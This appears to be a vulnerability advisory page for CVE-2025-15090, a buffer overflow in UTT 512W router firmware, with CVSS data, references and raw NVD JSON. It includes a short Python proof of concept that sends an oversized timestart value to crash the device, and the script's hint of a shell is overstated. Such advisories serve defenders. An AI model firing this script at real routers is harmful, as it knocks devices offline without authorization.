CVE-2025-15090

Description

A vulnerability was found in UTT 进取 512W up to 1.7.7-171114. This vulnerability affects the function strcpy of the file /goform/formConfigNoticeConfig. The manipulation of the argument timestart results in buffer overflow. The attack may be performed from remote. The exploit has been made public and could be used.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:utt:512w_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:utt:512w:3.0:*:*:*:*:*:*:* - NOT VULNERABLE

UTT 进取 512W 固件 <= 1.7.7-171114

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-15090 PoC
# UTT 进取 512W Buffer Overflow in /goform/formConfigNoticeConfig
# Target: timestart parameter via strcpy overflow

def exploit(target_ip, target_port=80):
    """Exploit buffer overflow in UTT 进取 512W router"""
    url = f"http://{target_ip}:{target_port}/goform/formConfigNoticeConfig"
    
    # Generate payload with long string to overflow buffer
    # Adjust length based on target buffer size (typically 256-512 bytes)
    overflow_length = 1024
    payload = "A" * overflow_length
    
    # Prepare POST data
    data = {
        "timestart": payload,
        # Other parameters may be needed
        "timeend": "12:00",
        "enable": "1"
    }
    
    try:
        print(f"[*] Sending exploit payload to {url}")
        print(f"[*] Payload length: {len(payload)}")
        
        response = requests.post(url, data=data, timeout=10)
        
        print(f"[+] Response status: {response.status_code}")
        
        if response.status_code == 200:
            print("[+] Payload sent successfully")
            print("[!] Target may be vulnerable - check for crash or shell")
        else:
            print(f"[-] Unexpected response: {response.status_code}")
            
    except requests.exceptions.Timeout:
        print("[!] Request timeout - target may have crashed (DoS successful)")
    except requests.exceptions.ConnectionError:
        print("[!] Connection failed - target may be down")
    except Exception as e:
        print(f"[-] Error: {str(e)}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    exploit(target, port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15090
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15090
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15090/
[4] VulDB https://vuldb.com/cve/CVE-2025-15090
[5] https://github.com/cymiao1978/cve/blob/main/new/15.md
[6] https://github.com/cymiao1978/cve/blob/main/new/15.md#poc
[7] https://vuldb.com/?ctiid.338419
[8] https://vuldb.com/?id.338419
[9] https://vuldb.com/?submit.708349

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15090", "sourceIdentifier": "[email protected]", "published": "2025-12-25T23:15:41.283", "lastModified": "2025-12-31T18:56:45.887", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in UTT 进取 512W up to 1.7.7-171114. This vulnerability affects the function strcpy of the file /goform/formConfigNoticeConfig. The manipulation of the argument timestart results in buffer overflow. The attack may be performed from remote. The exploit has been made public and could be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:utt:512w_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.7-171114", "matchCriteriaId": "962A8F4C-6C57-4682-AF35-16B98ABE7890"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:utt:512w:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "43C0782C-5F34-44B8-9A45-DF3A6121D668"}]}]}], "references": [{"url": "https://github.com/cymiao1978/cve/blob/main/new/15.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/cymiao1978/cve/blob/main/new/15.md#poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338419", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338419", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.708349", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}